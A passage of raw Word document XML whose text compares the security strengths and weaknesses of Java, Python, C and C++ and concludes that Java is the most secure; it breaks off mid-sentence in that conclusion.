          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bytecode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which makes it platform-independent and reduces the risk of platform-specific vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A36EDB9"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curity Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Security Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> restricts what operations code can perform (e.g., file access, network access) to prevent unauthorized actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684A96B0"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rong Typing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strongly typed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, so </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type-related errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are caught at compile-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083DEE4" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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ecurity Weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0A9B75"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ava Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The security of a Java application can be compromised if third-party libraries are vulnerable (e.g., outdated versions of libraries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FAAE0B"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serialization Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Older or improperly implemented code may be vulnerable to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java deserialization attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where malicious data is processed by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F3D455" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00133B2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B9A5715">
          <v:rect id="_x0000_i1137" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23258FC8" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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2. Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7309A965" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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ecurity Strengths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B47B4E"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igh-Level Language</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Python abstracts away low-level details like memory management, which reduces the risk of memory-related vulnerabilities like buffer overflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEB43AB"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Garbage Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Like Java, Python has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic memory management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through garbage collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8FB2EB"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adability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Python's </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>readable syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps developers write secure code by reducing the likelihood of mistakes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CF92E7"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Dynamic Typing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Python is dynamically typed, which can reduce errors in the development process when used carefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B435DDD" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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ecurity Weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274DF18"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ynamic Typing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The lack of compile-time type checking means that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type-related bugs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as passing incorrect arguments to functions) are only caught at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F86A4"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curity Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Python has security issues related to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unsafe libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., using insecure functions for handling user input or file handling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD2322"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terpreted Language</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Because Python is interpreted, malicious code can be more easily injected and executed without needing to go through a compilation phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C39BC39" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00133B2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B0BA82D">
          <v:rect id="_x0000_i1138" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF6ADA1" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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3. C/C++:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6FA193" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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ecurity Strengths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14966510"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trol Over System Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: C and C++ give developers more control over system resources like memory and CPU, allowing for optimization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AFD66D"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d in High-Security Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: These languages are often used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security-critical applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, like operating systems, firewalls, and cryptography libraries, where developers must be mindful of security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC1F59B" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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ecurity Weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F80542"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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: C and C++ require </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual memory management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (malloc, free), which is prone to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory leaks</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buffer overflow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dangling pointers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EEBFE6"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ointer Arithmetic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Pointers and pointer arithmetic make </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buffer overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks more likely, which can lead to arbitrary code execution or access violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6244850A"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Built-in Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: C/C++ provides minimal </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for errors like out-of-bounds access or null pointer dereferencing, which can result in undefined behavior and security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B0AA18"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lexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Low-level operations and manual memory management can lead to human error, introducing bugs that compromise security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097A61BE" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00133B2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93FC7C0">
          <v:rect id="_x0000_i1139" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="370475CA" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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4. C++ (Compared to C):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41278FF6"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 inherits most of the security risks of C, but it adds some additional features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object-oriented programming</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RAII (Resource Acquisition Is Initialization)</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exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for better error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CAB872"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s extra features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can potentially help reduce some security risks, but C++ still requires </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual memory management</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pointer arithmetic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making it still prone to security vulnerabilities like C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D12AC5A" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00133B2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DEDEE6">
          <v:rect id="_x0000_i1140" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="006AE8B8" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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ich Language is More Secure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E7D3D"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ava</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most secure of the four languages, primarily because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C74EF3"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doesn’t have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pointers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, avoiding many low-level vulnerabilities (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buffer overflows</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memory corruption</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2C91AF"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provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic memory management</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runtime security checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDE129"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has the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Security Manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and runs in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sandboxed environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
